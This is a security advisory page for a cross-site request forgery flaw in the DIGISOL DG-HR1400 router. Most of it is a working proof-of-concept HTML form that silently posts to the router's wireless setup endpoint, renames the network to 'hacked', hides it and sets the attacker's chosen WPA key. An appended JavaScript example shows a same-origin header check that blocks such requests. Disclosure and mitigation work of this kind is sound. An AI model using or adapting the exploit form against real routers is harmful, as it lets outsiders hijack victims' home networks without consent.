DIGISOL DG-HR1400 Cross Site Request Forgery

2017.02.24
Credit: Indrajith A.N
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<html>
<!-- Digisol Router CSRF Exploit - Indrajith A.N -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
  <input type="hidden" name="mode" value="0" />
  <input type="hidden" name="apssid" value="hacked" />
  <input type="hidden" name="startScanUplinkAp" value="0" />
  <input type="hidden" name="domain" value="1" />
  <input type="hidden" name="hiddenSSID" value="on" />
  <input type="hidden" name="ssid" value="hacked" />
  <input type="hidden" name="band" value="10" />
  <input type="hidden" name="chan" value="6" />
  <input type="hidden" name="chanwid" value="1" />
  <input type="hidden" name="txRate" value="0" />
  <input type="hidden" name="method&#95;cur" value="6" />
  <input type="hidden" name="method" value="6" />
  <input type="hidden" name="authType" value="2" />
  <input type="hidden" name="length" value="1" />
  <input type="hidden" name="format" value="2" />
  <input type="hidden" name="defaultTxKeyId" value="1" />
  <input type="hidden" name="key1" value="0000000000" />
  <input type="hidden" name="pskFormat" value="0" />
  <input type="hidden" name="pskValue" value="csrf1234" />
  <input type="hidden" name="checkWPS2" value="1" />
  <input type="hidden" name="save" value="Apply" />
  <input type="hidden" name="basicrates" value="15" />
  <input type="hidden" name="operrates" value="4095" />
  <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
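The form above carries no per-session token, so the request is accepted from any page the administrator's browser loads. As an added example (not part of the advisory and not vendor code), the same-origin check below shows how a handler for a state-changing endpoint such as form2WlanBasicSetup.cgi can reject it; the function names, the request shape and the sample requests are assumptions constructed for illustration.

```javascript
// Added example, not from the advisory. Function names and the request
// shape ({ method, headers } with lower-cased header names) are assumptions.
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// Normalise a URL or a bare host[:port] to host[:port]; null if unusable.
function hostOf(value, isBareHost) {
  if (!value || value === 'null') return null; // 'null' is an opaque origin
  try {
    return new URL(isBareHost ? 'http://' + value : value).host.toLowerCase();
  } catch (e) {
    return null; // malformed header value
  }
}

// Allow a state-changing request only when Origin (or Referer, if the
// Origin header is absent) names the same host as the Host header.
function checkStateChange(req) {
  if (SAFE_METHODS.has(req.method.toUpperCase())) {
    return { allow: true, reason: 'safe method' };
  }
  const target = hostOf(req.headers['host'], true);
  if (target === null) return { allow: false, reason: 'missing Host' };
  const raw = 'origin' in req.headers ? req.headers['origin'] : req.headers['referer'];
  const source = hostOf(raw, false);
  if (source === null) return { allow: false, reason: 'no usable Origin/Referer' };
  if (source !== target) return { allow: false, reason: 'cross-origin: ' + source };
  return { allow: true, reason: 'same origin' };
}

// Constructed sample requests (not captured traffic).
const SAMPLES = [
  // Submitted from the router's own settings page.
  { method: 'POST', headers: { host: '192.168.2.1', origin: 'http://192.168.2.1' } },
  // Submitted by the form hosted on another site. history.pushState only
  // rewrites the path of the hosting page, so the origin is unchanged.
  { method: 'POST', headers: { host: '192.168.2.1', origin: 'http://poc.example', referer: 'http://poc.example/' } },
  // Form opened from a local file: the browser sends an opaque origin.
  { method: 'POST', headers: { host: '192.168.2.1', origin: 'null' } },
  // Neither header present: fail closed.
  { method: 'POST', headers: { host: '192.168.2.1:80' } },
];

for (const s of SAMPLES) {
  const r = checkStateChange(s);
  console.log(s.headers.origin || '(none)', '->', r.allow ? 'allow' : 'deny', '(' + r.reason + ')');
}
```

A header check of this kind complements a per-session anti-CSRF token in the form; it does not replace one.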



Copyright 2024, cxsecurity.com

 
